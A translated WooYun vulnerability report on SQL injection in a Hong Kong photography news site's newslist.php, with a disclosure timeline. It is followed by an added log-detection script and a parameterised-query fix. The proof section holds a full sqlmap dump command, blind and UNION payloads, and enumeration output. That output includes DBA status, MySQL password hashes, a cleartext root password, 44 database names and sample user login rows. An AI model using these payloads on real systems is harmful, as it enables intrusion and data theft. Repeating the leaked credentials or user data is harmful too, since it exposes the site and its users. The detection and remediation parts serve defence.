
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0155451

Vulnerability title: SQL injection at a Photonews 攝影日報 endpoint (DBA privileges + root password disclosure + 44 databases + 4.94 million users' usernames, passwords and login IPs disclosed) (Hong Kong)

Affected vendor: Photonews 攝影日報

Author: 路人甲

Submitted: 2015-11-24 11:38

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Vulnerability status: handed over to a third-party partner organisation (hkcert, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-24: details sent to the vendor, awaiting vendor handling
2015-11-27: vendor confirmed; details disclosed to the vendor only
2015-12-07: details disclosed to core white hats and domain experts
2015-12-17: details disclosed to regular white hats
2015-12-27: details disclosed to intern white hats
2016-01-11: details disclosed to the public

Brief description:

Photography can have many styles; in fact, some so-called styles arise from differences in geography and natural environment.

Detailed description:

URL: http://**.**.**.**/news/newslist.php?selectCat=3

$ python sqlmap.py -u "http://**.**.**.**/news/newslist.php?selectCat=3" -p selectCat --technique=BU --random-agent --batch --no-cast -D photonews -T jk_loguser -C u,p,ip,date --dump --start 1 --stop 5


Database: photonews
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| jk_loguser | 4945522 |


A small sample of the data:

Database: photonews
Table: jk_loguser
[4 entries]
+---------+------------+-------------+----------------+
| u | date | p | ip |
+---------+------------+-------------+----------------+
| | 2005-12-15 | jk: | **.**.**.** |
| | 2005-12-15 | jk: | **.**.**.** |
| | 2005-12-15 | jk: | **.**.**.** |
| netalex | 2005-12-15 | jk:12344312 | **.**.**.** |
+---------+------------+-------------+----------------+

Proof of vulnerability:

---
Parameter: selectCat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: selectCat=3 AND 4996=4996
Type: UNION query
Title: MySQL UNION query (56) - 10 columns
Payload: selectCat=3 UNION ALL SELECT 56,56,56,CONCAT(0x71627a6271,0x6a664d415a535175767767744e4c4e555a5967654673625972747766677657584b4b72515963705a,0x71787a7071),56,56,56,56,56,56#
---
web server operating system: FreeBSD
web application technology: PHP 5.3.11, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
current user: 'jacky@localhost'
current user is DBA: True
database management system users [8]:
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'jacky'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'shop'@'localhost'
database management system users password hashes:
[*] jacky [1]:
password hash: *285B89EAF52B50EC0B88D65D1BCDAF2D23A8B6BF
clear-text password: 1998
[*] root [2]:
password hash: *285B89EAF52B50EC0B88D65D1BCDAF2D23A8B6BF
clear-text password: 1998
password hash: NULL
[*] shop [1]:
password hash: *04B1AFC2D736152C4ACB6796B56E66E174F331D7
available databases [44]:
[*] #mysql50#health-popart
[*] betterhealth
[*] betterhealthemag
[*] faceapp_table
[*] facebookgiftsys
[*] forsale
[*] healthlink
[*] healthlinknew
[*] healthlinkQuery
[*] healthweb
[*] information_schema
[*] kidneyquestion
[*] limesurvey2
[*] mysql
[*] performance_schema
[*] photo
[*] photo2
[*] photonew2
[*] photonews
[*] photonews_new
[*] photonewweb
[*] photoold
[*] photoshop
[*] photoshop_hk
[*] popartdb
[*] poparttest
[*] shop
[*] shop2
[*] shopnewver
[*] shopvernew
[*] test
[*] testwordpress3
[*] ucenter
[*] ucenter2
[*] uchome
[*] uchome2
[*] wacoal
[*] wacoal_2012
[*] wacoal_2013
[*] wacoal_2014
[*] wacoal_2015
[*] webalbum
[*] wordpresstest
[*] wordpresstest2
current database: 'photonews'
Database: photonews
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| jk_loguser | 4945522 |
| pcphoto_iDollar | 366295 |
| pcphoto_forumarticle | 193014 |
| pcphoto_camerafield | 46694 |
| nuke_users | 34274 |
| pcphoto_memberlevel | 25409 |
| blog_upload_data | 18790 |
| pcphoto_photographvote | 15634 |
| pcphoto_photographphoto | 12027 |
| gamepoint | 11170 |
| blog_msg_data | 6556 |
| pcphoto_privatemessage | 6264 |
| blog_reply_data | 6125 |
| pcphoto_photoshowphoto | 5652 |
| pcphoto_libraryphoto | 3632 |
| pcphoto_photoshowvote | 3123 |
| pcphoto_userarticlevote | 2662 |
| blog_config_data | 2069 |
| blog_user_data | 2069 |
| blog_hit_data | 2068 |
| hkphoto | 1675 |
| pcphoto_newsarticle | 1402 |
| blog_msgnum_data | 1336 |
| pcphoto_libraryauth | 1273 |
| sonycontest | 1217 |
| talklog | 1187 |
| sonycontest2 | 1150 |
| pcphoto_cameraphoto | 1017 |
| pcphoto_newsarticle3 | 1000 |
| talk_epson | 944 |
| vitagreencontest | 903 |
| pcphoto_photoshowmember | 828 |
| pcphoto_cameravote | 739 |
| pcphoto_photoshowalbum | 702 |
| pcphoto_photoshowalbum2 | 694 |
| upload_data | 557 |
| pcphoto_camera | 489 |
| blog_link_data | 436 |
| webscan | 395 |
| upload_data_news | 386 |
| book_data | 385 |
| buyer_history | 336 |
| bwseminar | 328 |
| editor_data | 305 |
| digitdaily | 298 |
| olympus_resubmit | 294 |
| centerphoto | 290 |
| shekcontest | 262 |
| olympus_event | 233 |
| `20years` | 232 |
| jvc_event | 229 |
| maleonntalk | 229 |
| nikond700 | 223 |
| shooting | 211 |
| pcphoto_download | 204 |
| phototalk | 202 |
| blog_taker_data | 174 |
| sony_event | 162 |
| pcphoto_userarticle | 150 |
| olympus420 | 141 |
| adobe_event | 137 |
| phototalk2 | 137 |
| photoshopcs | 131 |
| newsonline_data | 127 |
| pcphoto_camerafieldtable | 125 |
| chkcontest | 120 |
| pcphoto_photographcatalog | 115 |
| dc100 | 84 |
| buyer_address | 74 |
| forum_config | 73 |
| book_contact | 60 |
| chinaphoto | 59 |
| pcphoto_auctionbuyer | 56 |
| d90 | 54 |
| award_data | 53 |
| pcphoto_auction | 52 |
| photoshopcs2 | 48 |
| pcphoto_forumtopic | 47 |
| bookorder2 | 45 |
| bookorder | 43 |
| d_letter | 43 |
| pcphoto_libraryalbum | 40 |
| pcphoto_modelbm | 39 |
| carddate | 35 |
| site_lock | 33 |
| pcphoto_auctioncatalog | 32 |
| sonya900_2 | 27 |
| pcphoto_cameracatalog | 26 |
| list_show | 23 |
| pcphoto_newscatalog | 22 |
| pcphoto_auctionvote | 20 |
| magtalk | 18 |
| nuke_users3 | 18 |
| sonya900 | 16 |
| photo2005_photographphoto | 14 |
| `23years` | 13 |
| changeforum | 13 |
| pcphoto_auctionwant | 13 |
| blog_photo_data | 12 |
| blog_photokind_data | 12 |
| pma_gift | 11 |
| blog_skin_data | 10 |
| newsonline_catalog | 10 |
| book_contact_msg | 9 |
| blog_photoac_data | 8 |
| blog_photocfg_data | 8 |
| digitdailycatalog | 7 |
| pcphoto_forumauth | 7 |
| book_magazine | 5 |
| pcphoto_downloadcatalog | 5 |
| tempmember | 5 |
| pcphoto_administrator | 4 |
| pcphoto_auctioncategory | 4 |
| pcphoto_librarycatalog | 4 |
| pcphoto_modelbmcatalog | 4 |
| pcphoto_newsauth | 4 |
| pcphoto_newsletter | 4 |
| pcphoto_pointslevel | 4 |
| pcphoto_userarticlecatalog | 4 |
| newsonline_news | 3 |
| wish_user | 3 |
| testtable | 2 |
| blog_school_data | 1 |
| blog_schoolnews_data | 1 |
| memberdate | 1 |
| newsonline_member | 1 |
| pcphoto_group | 1 |
| photo2005_photographcatalog | 1 |
| ticket | 1 |
+-----------------------------+---------+
Database: photonews
Table: jk_loguser
[4 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| date | date |
| ip | varchar(20) |
| p | varchar(20) |
| u | varchar(20) |
+--------+-------------+
Database: photonews
Table: jk_loguser
[4 entries]
+---------+------------+-------------+----------------+
| u | date | p | ip |
+---------+------------+-------------+----------------+
| | 2005-12-15 | jk: | **.**.**.** |
| | 2005-12-15 | jk: | **.**.**.** |
| | 2005-12-15 | jk: | **.**.**.** |
| netalex | 2005-12-15 | jk:12344312 | **.**.**.** |
+---------+------------+-------------+----------------+
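The sqlmap output above leaves a recognisable trail in the web server's access log: the boolean probe (`AND 4996=4996` / `AND 4996=4997`), the `UNION ALL SELECT` row with hex-encoded `CONCAT` markers, and, most generally, a non-integer value in a parameter the application only ever uses as an integer. The following detection script is an added example and is not part of the original report; the log lines are constructed (RFC 5737 documentation addresses, the UNION payload abbreviated), the log format is assumed to be Apache combined format, and the list of integer-typed parameters is an assumption based on the report's `selectCat=3` usage.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed Apache combined-format log lines; IPs are RFC 5737 documentation
# addresses and the UNION payload is abbreviated from the one in the report.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Nov/2015:11:20:01 +0800] "GET /news/newslist.php?selectCat=3 HTTP/1.1" 200 5120
203.0.113.10 - - [24/Nov/2015:11:20:02 +0800] "GET /news/newslist.php?selectCat=3%20AND%204996%3D4996 HTTP/1.1" 200 5120
203.0.113.10 - - [24/Nov/2015:11:20:03 +0800] "GET /news/newslist.php?selectCat=3%20AND%204996%3D4997 HTTP/1.1" 200 812
203.0.113.10 - - [24/Nov/2015:11:20:04 +0800] "GET /news/newslist.php?selectCat=3%20UNION%20ALL%20SELECT%2056,56,56,CONCAT(0x71627a6271,0x41,0x71787a7071),56,56,56,56,56,56%23 HTTP/1.1" 200 5210
198.51.100.7 - - [24/Nov/2015:11:21:00 +0800] "GET /news/newslist.php?selectCat=5 HTTP/1.1" 200 4090
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)

# Parameters the application treats as integers (assumption based on the
# report's selectCat=3 usage). Anything non-numeric here is a policy violation.
INTEGER_PARAMS = {"selectCat"}

# Signature rules applied to the URL-decoded query string.
RULES = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("boolean_compare", re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("hex_concat", re.compile(r"\bconcat\(\s*0x[0-9a-f]+", re.I)),
]


def classify_request(path):
    """Return the rule names that fire for one request path, in RULES order,
    followed by a type check on the integer-typed parameters."""
    raw_query = path.partition("?")[2]
    decoded = unquote_plus(raw_query)
    hits = [name for name, rx in RULES if rx.search(decoded)]
    for key, value in parse_qsl(raw_query, keep_blank_values=True):
        if key in INTEGER_PARAMS and not value.strip().isdigit():
            hits.append("non_numeric_" + key)
    return hits


def scan_log(log_text):
    """Parse each log line and collect those where at least one rule fires."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify_request(m.group("path"))
        if rules:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "path": m.group("path"), "rules": rules})
    return findings


def suspicious_ips(findings, threshold=2):
    """Count flagged requests per source IP and keep those at or above the
    threshold: a blind-injection run sends many such requests in succession."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["rules"])
    print(suspicious_ips(scan_log(SAMPLE_LOG)))
```

The type check on `selectCat` is the rule worth keeping even after the signatures go stale: it needs no knowledge of any particular payload, only of what the application expects. On the constructed input, the two boolean probes and the UNION request are flagged and the probing address crosses the per-IP threshold while the ordinary visitor does not.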

Remediation:

Deploy a WAF.
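A WAF is a compensating control; the root cause is that `selectCat` is spliced into the SQL text. The example below is added here and is not the site's code (the report does not show `newslist.php`): it reconstructs the defect class in Python against an in-memory SQLite table with constructed rows, so that the report's boolean probe can be run against the vulnerable form and the fixed form side by side. The table name `news`, its columns and the sample rows are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the news table behind newslist.php;
# the table and column names are assumptions, not the site's real schema.
SAMPLE_ROWS = [
    (1, 3, "Lens review"),
    (2, 3, "Street photography tips"),
    (3, 5, "Studio lighting"),
]


def make_db():
    """In-memory SQLite database so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def newslist_vulnerable(conn, select_cat):
    """The defect class in the report: the request parameter is spliced into the
    SQL text, so conditions appended to it become part of the query."""
    sql = "SELECT title FROM news WHERE cat = " + select_cat + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def newslist_fixed(conn, select_cat):
    """Validate the parameter as an integer and bind it with a placeholder.
    The value can then only ever be compared against the cat column."""
    if not select_cat.strip().isdigit():
        raise ValueError("selectCat must be a non-negative integer")
    cat = int(select_cat)
    rows = conn.execute("SELECT title FROM news WHERE cat = ? ORDER BY id", (cat,))
    return [row[0] for row in rows]


def demo():
    """Run the report's boolean-based probe against both versions."""
    conn = make_db()
    result = {
        # The blind oracle: a true condition leaves the result unchanged...
        "vuln_true": newslist_vulnerable(conn, "3 AND 4996=4996"),
        # ...and a false one empties it, which is what boolean-based blind
        # extraction relies on.
        "vuln_false": newslist_vulnerable(conn, "3 AND 4996=4997"),
        "fixed_ok": newslist_fixed(conn, "3"),
    }
    try:
        newslist_fixed(conn, "3 AND 4996=4996")
        result["fixed_rejected"] = False
    except ValueError:
        result["fixed_rejected"] = True
    return result


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

In the PHP stack the report identifies, the same fix is an `(int)` cast or `ctype_digit` check on `$_GET['selectCat']` followed by a prepared statement through mysqli or PDO with a bound parameter. Separately, the proof shows the application connecting as a DBA-privileged account whose password also works for root; the web application's database user should be limited to the `photonews` database and to the statements it needs, so that an injection, if one recurs, cannot enumerate the other 43 databases or read `mysql.user`.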

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed at: 2015-11-27 15:12

Vendor reply:

Referred to related parties.

Latest status:

None yet